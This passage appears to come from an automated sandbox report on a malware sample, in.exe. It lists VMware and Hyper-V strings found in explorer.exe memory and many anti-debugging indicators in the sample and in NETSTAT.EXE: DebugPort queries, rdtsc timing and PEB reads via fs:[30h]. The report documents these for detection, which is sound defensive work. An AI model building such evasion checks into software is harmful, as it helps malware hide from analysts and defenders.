Source: explorer.exe, 00000004.00000000.275212385.0000000008DBD000.00000004.00000001.sdmp; Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmp; Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: explorer.exe, 00000004.00000002.610626366.00000000048E0000.00000004.00000001.sdmp; Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmp; Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}qqqqqqqqqqqqqq
Source: explorer.exe, 00000004.00000000.273106949.0000000008ACF000.00000004.00000001.sdmp; Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: explorer.exe, 00000004.00000000.273493490.0000000008B88000.00000004.00000001.sdmp; Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 00000004.00000000.273106949.0000000008ACF000.00000004.00000001.sdmp; Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 00000004.00000000.267766064.00000000069DA000.00000004.00000001.sdmp; Binary or memory string: VMware SATA CD002
          Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
          Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
          Source: explorer.exe, 00000004.00000002.612129459.00000000059C0000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
          Source: C:\Users\user\Desktop\in.exeProcess information queried: ProcessInformation
          Source: C:\Users\user\Desktop\in.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\NETSTAT.EXEProcess queried: DebugPort
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_00409A90 rdtsc
          Source: C:\Users\user\Desktop\in.exeCode function: 2_2_0040ACD0 LdrLoadDll,
          Source: C:\Users\user\Desktop\in.exe | Code function: 1_2_00B47790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 1_2_00EFF471 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 1_2_00EFF2C6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 1_2_00EFF329 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 1_2_00EFF289 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 1_2_00EFEA1A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_00B47790 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016CC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016CB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016E3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01723540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016C7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01778D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0172A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016C4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016C4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016A9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01758DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016BD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_017341E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_017251BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D61A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_017269A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016A2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DA185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016CC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D2990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016C746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01771074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01762073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0173C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016C0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016BB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01774015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01727016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01761C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01726C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0177740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01726CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_017614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01778CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0173B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0173B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016E90AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DF0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DF0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016A9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01723884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016ADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016BFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01778F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016ADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016BEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01778B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016A4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0173FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0176131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0177070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016CF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016E37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_017253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01775BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01727794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0175D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0176138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016E927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0175B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01778A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016CAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01734257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016A9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0175FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016C3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016AAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016B76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D2AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01778ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016D2ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016E8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0175FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016A52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_01770EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_017246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016BAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DFAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_0173FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\in.exe | Code function: 2_2_016DD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C92ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02D38ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C936CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02CA8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02D1FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C776E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C916E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C92AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02CFFE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C9D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C652A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02CE46A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02D30EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C7AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C9FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C69240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C77E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02CF4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C7766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02CA927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02D1B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02D38A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C8AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C6C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C98E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C78A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C6AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C83A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXE | Code function: 11_2_02C9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C65210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D21608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D1FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C903E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CA37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C71B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D1D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C78794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D2138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C92397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C94BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D35BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C6DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C7FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C93B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D2131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D3070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C8F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C64F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C9E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D38CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CFB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02D214FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02C658EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 11_2_02CE6CF0 mov eax, dword ptr fs:[00000030h]
